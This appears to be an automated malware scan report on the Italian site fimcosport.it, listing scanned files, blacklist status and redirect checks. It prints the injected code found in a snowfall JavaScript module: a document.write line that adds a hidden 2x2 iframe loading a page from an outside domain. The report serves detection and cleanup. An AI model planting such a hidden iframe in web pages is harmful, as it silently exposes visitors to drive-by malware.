Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fimcosport.it
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fimcosport.it/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fimcosport.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:24 GMT Location: http://www.fimcosport.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/ | 200 OK Content-Length: 26050 Content-Type: text/html | clean |
http://www.fimcosport.it/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://fimcosport.it/modules/mod_snowfalling/mod_snowfalling.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:26 GMT Location: http://www.fimcosport.it/modules/mod_snowfalling/mod_snowfalling.js Server: Apache Content-Length: 275 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/modules/mod_snowfalling/mod_snowfalling.js | 200 OK Content-Length: 15014 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thejunglegroup-website.co.uk/akpm.html?j=1501017></iframe>');
function SnowStorm(imagePath, flakeWidth, flakeHeight, flakesMax, flakesMaxActive, vMaxX, vMaxY, flakeBottom, snowStick, snowCollect, followMouse, onlyVerticalFall, swayingFlake, swayingOffsetMin, swayingOffsetMax, stakingOrder, usePNG, flakeTypes) { var targetElement = null; var zI s.init(); s.active = true; } } if (document.addEventListener) { document.addEventListener('DOMContentLoaded',function(){s.start(true)},false); window.addEventListener('load',function(){s.start(true)},false); } else { addEvent(window,'load',function(){s.start(true)}); } }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://thejunglegroup-website.co.uk/akpm.html?j=1501017 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://thejunglegroup-website.co.uk/akpm.html?j=1501017>
http://www.fimcosport.it/templates/gk_corporate/lib/scripts/gk_image_show.js | 200 OK Content-Length: 7095 Content-Type: application/javascript | clean |
http://fimcosport.it/templates/gk_corporate/lib/scripts/template_scripts.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:27 GMT Location: http://www.fimcosport.it/templates/gk_corporate/lib/scripts/template_scripts.js Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/templates/gk_corporate/lib/scripts/template_scripts.js | 200 OK Content-Length: 3788 Content-Type: application/javascript | clean |
http://fimcosport.it/templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:27 GMT Location: http://www.fimcosport.it/templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 Server: Apache Content-Length: 341 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 3391 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://fimcosport.it/./ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:28 GMT Location: http://www.fimcosport.it/ Server: Apache Content-Length: 233 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://fimcosport.it/index.php?option=com_comprofiler&task=registers | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 22 Dec 2014 12:26:28 GMT Location: http://www.fimcosport.it/index.php?option=com_comprofiler&task=registers Server: Apache Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.fimcosport.it/index.php?option=com_comprofiler&task=registers | 200 OK Content-Length: 46037 Content-Type: text/html | clean |
http://www.fimcosport.it/components/com_comprofiler/js/curvycorners.min.js?v=86f692ef05484bef | 200 OK Content-Length: 32607 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/cb12.min.js?v=2d02b79be7ed82a9 | 200 OK Content-Length: 7909 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/overlib_all_mini.js?v=4682a467a72b964b | 200 OK Content-Length: 48035 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/jquery-1.5.2/jquery-1.5.2.min.js?v=42fa57838ccf3eba | 200 OK Content-Length: 85923 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/jquery-1.5.2/jquery.metadata.min.js?v=9758879755ee8a06 | 200 OK Content-Length: 3996 Content-Type: application/javascript | clean |
http://www.fimcosport.it/components/com_comprofiler/js/jquery-1.5.2/jquery.validate.min.js?v=7d582be6fdcc4e04 | 200 OK Content-Length: 20913 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fimcosport.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 22 Dec 2014 12:26:24 GMT
Location: http://www.fimcosport.it/
Server: Apache
Content-Length: 233
Content-Type: text/html; charset=iso-8859-1
...233 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fimcosport.it
Referer: http://www.google.com/search?q=fimcosport.it
Result:
The result is similar to the first query. There are no suspicious redirects found.